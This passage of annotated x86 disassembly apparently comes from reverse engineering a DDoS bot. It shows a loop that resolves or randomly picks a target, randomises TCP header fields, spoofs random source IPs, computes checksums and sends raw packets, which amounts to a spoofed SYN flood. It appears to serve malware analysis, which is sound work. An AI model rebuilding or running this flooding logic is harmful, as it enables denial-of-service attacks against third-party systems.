%edi,%edi 8049ecb: c6 45 b0 00 movb $0x0,0xffffffb0(%ebp) 8049ecf: 83 7d 38 00 cmpl $0x0,0x38(%ebp) 8049ed3: 75 06 jne 0x8049edb 8049ed5: 8b 45 d8 mov 0xffffffd8(%ebp),%eax 8049ed8: 89 45 ac mov %eax,0xffffffac(%ebp) 8049edb: c6 45 b1 06 movb $0x6,0xffffffb1(%ebp) 8049edf: 66 c7 45 b2 00 14 movw $0x1400,0xffffffb2(%ebp) 8049ee5: 31 f6 xor %esi,%esi 8049ee7: 8d 5d a8 lea 0xffffffa8(%ebp),%ebx 8049eea: 89 9d 3c ff ff ff mov %ebx,0xffffff3c(%ebp) use name ? 8049ef0: c7 85 34 ff ff ff 00 movl $0x0,0xffffff34(%ebp) 8049ef7: 00 00 00 8049efa: 83 7d 38 00 cmpl $0x0,0x38(%ebp) 8049efe: 74 5b je 0x8049f5b yes 8049f00: 85 f6 test %esi,%esi 8049f02: 7f 57 jg 0x8049f5b 8049f04: 8b 5d 3c mov 0x3c(%ebp),%ebx 8049f07: 53 push %ebx 8049f08: e8 73 20 00 00 call get_host_by_name 8049f0d: 89 c2 mov %eax,%edx 8049f0f: 83 c4 04 add $0x4,%esp 8049f12: 85 d2 test %edx,%edx 8049f14: 75 1a jne 0x8049f30 8049f16: 68 58 02 00 00 push $0x258 8049f1b: e8 ac b7 00 00 call seterrno_cx 8049f20: c7 85 34 ff ff ff 01 movl $0x1,0xffffff34(%ebp) 8049f27: 00 00 00 8049f2a: 83 c4 04 add $0x4,%esp 8049f2d: eb 2c jmp 0x8049f5b 8049f2f: 90 nop 8049f30: 6a 04 push $0x4 8049f32: 8d 85 64 ff ff ff lea 0xffffff64(%ebp),%eax 8049f38: 50 push %eax 8049f39: 8b 42 10 mov 0x10(%edx),%eax 8049f3c: 8b 00 mov (%eax),%eax 8049f3e: 50 push %eax 8049f3f: e8 3c c5 00 00 call bcopy 8049f44: 8b 85 64 ff ff ff mov 0xffffff64(%ebp),%eax 8049f4a: 89 45 d8 mov %eax,0xffffffd8(%ebp) 8049f4d: 89 45 f4 mov %eax,0xfffffff4(%ebp) 8049f50: 89 45 ac mov %eax,0xffffffac(%ebp) 8049f53: be 40 9c 00 00 mov $0x9c40,%esi 8049f58: 83 c4 0c add $0xc,%esp if DNS resolution failed, use random IP dst 8049f5b: 83 bd 34 ff ff ff 00 cmpl $0x0,0xffffff34(%ebp) 8049f62: 75 8c jne 0x8049ef0 8049f64: e8 ef c0 00 00 call call_random 8049f69: bb 11 0c 00 00 mov $0xc11,%ebx 8049f6e: 99 cltd 8049f6f: f7 fb idiv %ebx,%eax 8049f71: 89 d0 mov %edx,%eax 8049f73: 80 c4 02 add $0x2,%ah 8049f76: 86 c4 xchg %al,%ah 8049f78: 66 89 45 cc mov %ax,0xffffffcc(%ebp) TCP window size 8049f7c: e8 d7 c0 00 00 call call_random 8049f81: bb 79 05 00 00 mov $0x579,%ebx 8049f86: 99 cltd 8049f87: f7 fb idiv %ebx,%eax 8049f89: 89 d0 mov %edx,%eax 8049f8b: 66 05 c8 00 add $0xc8,%ax 8049f8f: 86 c4 xchg %al,%ah 8049f91: 66 89 45 ea mov %ax,0xffffffea(%ebp) TCP src port 8049f95: e8 be c0 00 00 call call_random 8049f9a: bb 40 9c 00 00 mov $0x9c40,%ebx 8049f9f: 99 cltd 8049fa0: f7 fb idiv %ebx,%eax 8049fa2: 89 d0 mov %edx,%eax 8049fa4: 66 40 inc %ax 8049fa6: 86 c4 xchg %al,%ah 8049fa8: 66 89 45 dc mov %ax,0xffffffdc(%ebp) TCP seq nbr 8049fac: e8 a7 c0 00 00 call call_random 8049fb1: bb 00 5a 62 02 mov $0x2625a00,%ebx 8049fb6: 99 cltd 8049fb7: f7 fb idiv %ebx,%eax 8049fb9: 8d 42 01 lea 0x1(%edx),%eax 8049fbc: 86 c4 xchg %al,%ah 8049fbe: c1 c8 10 ror $0x10,%eax 8049fc1: 86 c4 xchg %al,%ah 8049fc3: 89 45 e0 mov %eax,0xffffffe0(%ebp) IP TTL 8049fc6: e8 8d c0 00 00 call call_random 8049fcb: bb 74 00 00 00 mov $0x74,%ebx 8049fd0: 99 cltd 8049fd1: f7 fb idiv %ebx,%eax 8049fd3: 80 c2 7d add $0x7d,%dl 8049fd6: 88 55 d0 mov %dl,0xffffffd0(%ebp) 8049fd9: 83 7d 20 00 cmpl $0x0,0x20(%ebp) 8049fdd: 75 3d jne 0x804a01c random IP src 8049fdf: e8 54 be 00 00 call random 8049fe4: bb ff 00 00 00 mov $0xff,%ebx 8049fe9: 99 cltd 8049fea: f7 fb idiv %ebx,%eax 8049fec: 52 push %edx 8049fed: e8 46 be 00 00 call random 8049ff2: 99 cltd 8049ff3: f7 fb idiv %ebx,%eax 8049ff5: 52 push %edx 8049ff6: e8 3d be 00 00 call random 8049ffb: 99 cltd 8049ffc: f7 fb idiv %ebx,%eax 8049ffe: 52 push %edx 8049fff: e8 34 be 00 00 call random 804a004: 99 cltd 804a005: f7 fb idiv %ebx,%eax 804a007: 52 push %edx 804a008: 68 b0 78 06 08 push $0x80678b0 // %u.%u.%u.%u 804a00d: 8d 85 68 ff ff ff lea 0xffffff68(%ebp),%eax 804a013: 50 push %eax 804a014: e8 ef 57 00 00 call sprintf 804a019: 83 c4 18 add $0x18,%esp set IP src 804a01c: 8d 85 68 ff ff ff lea 0xffffff68(%ebp),%eax 804a022: 50 push %eax 804a023: e8 64 2e 00 00 call inet_addr 804a028: 89 45 d4 mov %eax,0xffffffd4(%ebp) 804a02b: 89 45 a8 mov %eax,0xffffffa8(%ebp) TCP crc=0 804a02e: 66 c7 45 ec 00 00 movw $0x0,0xffffffec(%ebp) IP crc=0 804a034: 66 c7 45 d2 00 00 movw $0x0,0xffffffd2(%ebp) copy beginning of TCP header 804a03a: 6a 14 push $0x14 804a03c: 8d 45 b4 lea 0xffffffb4(%ebp),%eax 804a03f: 50 push %eax 804a040: 8d 45 dc lea 0xffffffdc(%ebp),%eax // TCP 804a043: 50 push %eax 804a044: e8 37 c4 00 00 call bcopy 804a049: 83 c4 10 add $0x10,%esp calculate TCP crc 804a04c: ba 20 00 00 00 mov $0x20,%edx 804a051: 8b 9d 3c ff ff ff mov 0xffffff3c(%ebp),%ebx 804a057: 89 9d 34 ff ff ff mov %ebx,0xffffff34(%ebp) 804a05d: 31 c9 xor %ecx,%ecx 804a05f: 66 c7 85 62 ff ff ff movw $0x0,0xffffff62(%ebp) 804a066: 00 00 804a068: 8b 9d 34 ff ff ff mov 0xffffff34(%ebp),%ebx 804a06e: 0f b7 03 movzwl (%ebx),%eax 804a071: 01 c1 add %eax,%ecx 804a073: 83 c3 02 add $0x2,%ebx 804a076: 89 9d 34 ff ff ff mov %ebx,0xffffff34(%ebp) 804a07c: 83 c2 fe add $0xfffffffe,%edx 804a07f: 83 fa 01 cmp $0x1,%edx 804a082: 7f e4 jg 0x804a068 804a084: 75 11 jne 0x804a097 804a086: 8a 03 mov (%ebx),%al 804a088: 88 85 62 ff ff ff mov %al,0xffffff62(%ebp) 804a08e: 0f b7 85 62 ff ff ff movzwl 0xffffff62(%ebp),%eax 804a095: 01 c1 add %eax,%ecx 804a097: 89 ca mov %ecx,%edx 804a099: c1 fa 10 sar $0x10,%edx 804a09c: 0f b7 c1 movzwl %cx,%eax 804a09f: 8d 0c 10 lea (%eax,%edx,1),%ecx 804a0a2: 89 c8 mov %ecx,%eax 804a0a4: c1 f8 10 sar $0x10,%eax 804a0a7: 01 c1 add %eax,%ecx 804a0a9: 89 c8 mov %ecx,%eax 804a0ab: 66 f7 d0 not %ax 804a0ae: 66 89 85 62 ff ff ff mov %ax,0xffffff62(%ebp) 804a0b5: 66 89 45 ec mov %ax,0xffffffec(%ebp) calculate IP checksum 804a0b9: ba 14 00 00 00 mov $0x14,%edx 804a0be: 8d 5d c8 lea 0xffffffc8(%ebp),%ebx 804a0c1: 89 9d 34 ff ff ff mov %ebx,0xffffff34(%ebp) 804a0c7: 31 c9 xor %ecx,%ecx 804a0c9: 66 c7 85 62 ff ff ff movw $0x0,0xffffff62(%ebp) 804a0d0: 00 00 804a0d2: 8d 36 lea (%esi),%esi 804a0d4: 8b 9d 34 ff ff ff mov 0xffffff34(%ebp),%ebx 804a0da: 0f b7 03 movzwl (%ebx),%eax 804a0dd: 01 c1 add %eax,%ecx 804a0df: 83 c3 02 add $0x2,%ebx 804a0e2: 89 9d 34 ff ff ff mov %ebx,0xffffff34(%ebp) 804a0e8: 83 c2 fe add $0xfffffffe,%edx 804a0eb: 83 fa 01 cmp $0x1,%edx 804a0ee: 7f e4 jg 0x804a0d4 804a0f0: 75 11 jne 0x804a103 804a0f2: 8a 03 mov (%ebx),%al 804a0f4: 88 85 62 ff ff ff mov %al,0xffffff62(%ebp) 804a0fa: 0f b7 85 62 ff ff ff movzwl 0xffffff62(%ebp),%eax 804a101: 01 c1 add %eax,%ecx 804a103: 89 ca mov %ecx,%edx 804a105: c1 fa 10 sar $0x10,%edx 804a108: 0f b7 c1 movzwl %cx,%eax 804a10b: 8d 0c 10 lea (%eax,%edx,1),%ecx 804a10e: 89 c8 mov %ecx,%eax 804a110: c1 f8 10 sar $0x10,%eax 804a113: 01 c1 add %eax,%ecx 804a115: 89 c8 mov %ecx,%eax 804a117: 66 f7 d0 not %ax 804a11a: 66 89 85 62 ff ff ff mov %ax,0xffffff62(%ebp) 804a121: 66 89 45 d2 mov %ax,0xffffffd2(%ebp) 804a125: 6a 10 push $0x10 804a127: 8d 45 f0 lea 0xfffffff0(%ebp),%eax 804a12a: 50 push %eax 804a12b: 6a 00 push $0x0 804a12d: 6a 28 push $0x28 804a12f: 8d 45 c8 lea 0xffffffc8(%ebp),%eax 804a132: 50 push %eax 804a133: 8b 9d 40 ff ff ff mov 0xffffff40(%ebp),%ebx 804a139: 53 push %ebx 804a13a: e8 fd ca 00 00 call sendto 804a13f: 83 c4 18 add $0x18,%esp 804a142: 83 7d 34 00 cmpl $0x0,0x34(%ebp) 804a146: 75 0c jne 0x804a154 804a148: 68 2c 01 00 00 push $0x12c 804a14d: e8 5e b4 00 00 call feof 804a152: eb 11 jmp 0x804a165 804a154: 39 7d 34 cmp %edi,0x34(%ebp) 804a157: 75 17 jne 0x804a170 804a159: 68 2c 01 00 00 push $0x12c 804a15e: e8 4d b4 00 00 call feof 804a163: 31 ff xor %edi,%edi 804a165: 4e dec %esi 804a166: 83 c4 04 add $0x4,%esp 804a169: e9 82 fd ff ff jmp 0x8049ef0 804a16e: 8d 36 lea (%esi),%esi 804a170: 47 inc %edi 804a171: e9 7a fd ff ff jmp 0x8049ef0 804a176: 8d 36 lea (%esi),%esi pid=0; return 0; 804a178: c7 05 74 e7 07 08 00 movl $0x0,pid 804a17f: 00 00 00 804a182: 31 c0 xor %eax,%eax 804a184: 8d a5 28 ff ff ff lea 0xffffff28(%ebp),%esp 804a18a: 5b pop %ebx 804a18b: 5e pop %esi 804a18c: 5f pop %edi 804a18d: 89 ec mov %ebp,%esp 804a18f: 5d pop %ebp 804a190: c3 ret 804a191: 8d 76 00 lea 0x0(%esi),%esi